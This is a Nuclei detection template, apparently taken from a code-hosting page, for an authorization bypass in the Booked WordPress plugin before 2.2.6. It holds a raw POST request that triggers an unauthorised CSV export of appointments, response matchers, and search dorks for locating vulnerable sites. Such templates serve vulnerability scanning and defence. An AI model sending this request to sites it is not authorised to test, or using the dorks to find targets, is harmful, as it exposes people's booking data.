53 lines
1.8 KiB
YAML
53 lines
1.8 KiB
YAML
id: booked-export-csv
|
|
|
|
info:
|
|
name: Booked < 2.2.6 - Broken Authentication
|
|
author: random-robbie
|
|
severity: high
|
|
description: |
|
|
The Booked plugin for WordPress is vulnerable to authorization bypass due to missing capability checks on several functions hooked via AJAX actions in versions up to, and including, 2.2.5. This makes it possible for authenticated attackers with subscriber-level permissions and above to execute several unauthorized actions.
|
|
remediation: Fixed in version 2.2.6
|
|
reference:
|
|
- https://codecanyon.net/item/booked-appointments-appointment-booking-for-wordpress/9466968
|
|
- http://boxyupdates.com/changelog.php?p=booked
|
|
- https://wpscan.com/vulnerability/10107
|
|
classification:
|
|
cpe: cpe:2.3:a:twinkletoessoftware:booked:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: twinkletoessoftware
|
|
product: booked
|
|
fofa-query: "wp-content/plugins/booked/"
|
|
publicwww-query: "/wp-content/plugins/booked/"
|
|
google-query: inurl:"/wp-content/plugins/booked/"
|
|
tags: wordpress,wpscan,wp-plugin,wp,booked,bypass
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /wp-admin/admin-post.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
|
|
|
booked_export_appointments_csv=
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "End Time"
|
|
- "Start Time"
|
|
- "Calendar"
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/csv
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100d94d067184d9a4c19ed0faf90e5f902ca5c95f9cf2e5406a1172f0b769e52f14022047573cce7b6c522d7b4eea3c4e1796c97bba0e9d888bb2ce8c4766f7c588d278:922c64590222798bb761d5b6d8e72950 |